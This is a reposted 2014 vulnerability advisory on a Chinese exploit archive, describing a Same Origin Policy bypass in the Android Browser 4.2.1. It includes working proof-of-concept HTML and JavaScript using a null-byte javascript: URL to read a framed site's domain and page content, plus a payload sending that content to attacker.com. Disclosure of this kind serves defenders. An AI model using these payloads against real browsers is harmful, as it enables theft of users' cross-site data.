首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Android Browser Same Origin Policy Bypass
来源:http://rhainfose.com 作者:Baloch 发布时间:2014-09-03  
#Vulnerability: Android Browser Same Origin Policy Bypass
#Impact: High/Critical
#Authors: Rafay Baloch
#Company: RHAinfoSEC
#Website: http://rhainfose.com

*Introduction*


Same Origin Policy (SOP) is one of the most important security mechanisms
that are applied in modern browsers, the basic idea behind the SOP is the
javaScript from one origin should not be able to access the properties of a
website on another origin. The origin is formed by the combination of
Scheme, domain and port with the port being an exception to IE. There are
some exceptions with SOP such the location property, objects wtih src
attribute. However, the fundamental are that different origins should not
be able to access the properties of one another.


*SOP Bypass*


A SOP bypass occurs when a sitea.com is some how able to access the
properties of siteb.com such as cookies, location, response etc. Due to the
nature of the issue and potential impact, this is very rarely found in
modern browsers. However, they are found once in a while. The following
writeup describes a SOP bypass vulnerability i found in my Qmobile Noir A20
with Android Browser 4.2.1, and later verified that Sony+Xperia+Tipo,
Samsung galaxy, HTC Wildfire, Motrorolla etc are also affected.


The following is a proof of concept:


*Proof Of Concept *


<iframe name="test" src="http://www.rhainfosec.com"></iframe>

<input type=button value="test"

onclick="window.open('\u0000javascript:alert(document.domain)','test')" >


As you can see that the code tries accessing the document.domain property
of a site loaded into an iframe. If you run the POC at attacker.com on any
of the modern browsers, it would return a similar error as attacker.com
should not be able to access the document.domain property of rhainfosec.com.

Blocked a frame with origin "http://jsbin.com" from accessing a frame with
origin "http://www.rhainfosec.com". Protocols, domains, and ports must
match.

   1. vagugebiweja:7


However, running it on any of the vulnerable smart phones default browsers
would alert the document.domain property indicating that the SOP was not
able to restrict the access to document.domain property of a site at a
different origin.


I created the following POC, so you can mess around with some stuff:


*Reading the response*


You can read the response of any page by accessing the
document.body.innerHTML property.


<iframe name="test" src="http://www.rhainfosec.com"></iframe>

<input type=button value="test"

onclick="window.open('\u0000javascript:alert(document.body.innerHTML)','test')"
>


*Stealing the response and sending it to an attackers domain*


In real world situation an attacker would send the response to his
controlled domain.


<iframe name="test" src="http://www.rhainfosec.com"></iframe>

<input type=button value="test"

onclick="window.open('\u0000javascript:var i=new Image();i.src='//
attacker.com?'+document.body.innerHTML;document.body.appendChild(i);','test')"
>



*Affected Versions*


The test was carried out on android browser 4.2.1 and later verified with
Galaxy S3, HTC wildfire, Sony Xperia. I haven't tested it on all the
versions that are affected.

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Wing FTP Server Authenticated
·Google Chrome 31.0 XSS Auditor
·Baidu Spark Browser v26.5.9999
·LeapFTP 3.1.0 URL Handling Buf
·IBM 1754 GCM KVM Multiple Vuln
·Apple iOS 7.1.2 Merge Apps Ser
·HTML Help Workshop 1.4 - (SEH)
·WWW File Share Pro 7.0 Denial
·NRPE 2.15 Remote Command Execu
·XRMS - Blind SQL Injection and
·Joomla Spider Contacts 1.3.6 (
·PhpWiki - Remote Command Execu
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved